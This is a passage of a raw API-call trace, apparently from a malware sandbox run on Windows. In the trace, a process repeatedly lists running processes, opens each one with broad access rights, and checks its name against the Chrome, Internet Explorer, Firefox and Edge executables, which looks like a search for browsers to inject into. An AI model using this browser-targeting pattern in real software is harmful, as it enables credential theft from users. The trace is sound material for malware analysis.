	[0206.673] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0206.674] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3038
	[0206.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.674] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0206.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.675] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.675] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0206.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.675] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.675] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x303c
	[0206.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.676] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.677] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.677] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.677] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.677] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.678] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.679] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3040
	[0206.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.679] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.679] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.679] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.680] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.680] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0206.681] CloseHandle (hObject=0x188) returned 1
	[0206.681] Sleep (dwMilliseconds=0x64) 
	[0206.779] GetCurrentProcessId () returned 0x110
	[0206.779] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0206.783] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0206.784] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0206.785] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0206.787] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3044
	[0206.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.787] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0206.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.787] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.788] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0206.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.788] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.789] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0206.790] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3048
	[0206.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.790] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0206.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.791] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.791] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0206.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.792] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.792] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0206.793] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x304c
	[0206.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.793] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0206.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.794] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.794] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0206.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.795] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.795] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0206.795] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3050
	[0206.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.796] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0206.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.796] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.796] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0206.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.797] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.797] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0206.797] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3054
	[0206.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.798] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0206.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.798] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.798] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0206.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.799] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.799] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0206.800] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3058
	[0206.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.800] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0206.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.800] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.800] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0206.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.801] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.801] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0206.802] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x305c
	[0206.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.802] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0206.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.802] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.802] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0206.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.803] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.803] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0206.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3060
	[0206.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.804] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0206.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.804] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.804] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0206.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.804] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.805] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.805] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3064
	[0206.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.805] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.806] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.806] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.806] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.807] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.807] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3068
	[0206.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.807] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.808] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.808] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.808] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.809] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.809] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x306c
	[0206.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.810] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.810] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.811] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.811] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.811] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.812] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3070
	[0206.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.812] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.812] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.813] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.813] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.813] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.814] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3074
	[0206.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.814] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.814] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.815] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.815] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.815] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.816] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3078
	[0206.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.816] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.817] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.817] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.817] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.817] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.818] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x307c
	[0206.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.818] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.819] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.819] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.819] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.819] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0206.820] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3080
	[0206.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.820] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0206.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.821] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.821] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0206.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.821] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.821] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.822] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3084
	[0206.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.822] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.823] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.823] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.823] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.823] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0206.824] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3088
	[0206.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.824] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.825] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.825] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.825] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.826] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0206.826] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x308c
	[0206.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.827] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0206.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.827] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.827] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0206.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.828] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.828] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.828] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3090
	[0206.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.829] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.829] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.829] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.830] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.830] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0206.830] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3094
	[0206.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.831] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0206.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.831] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
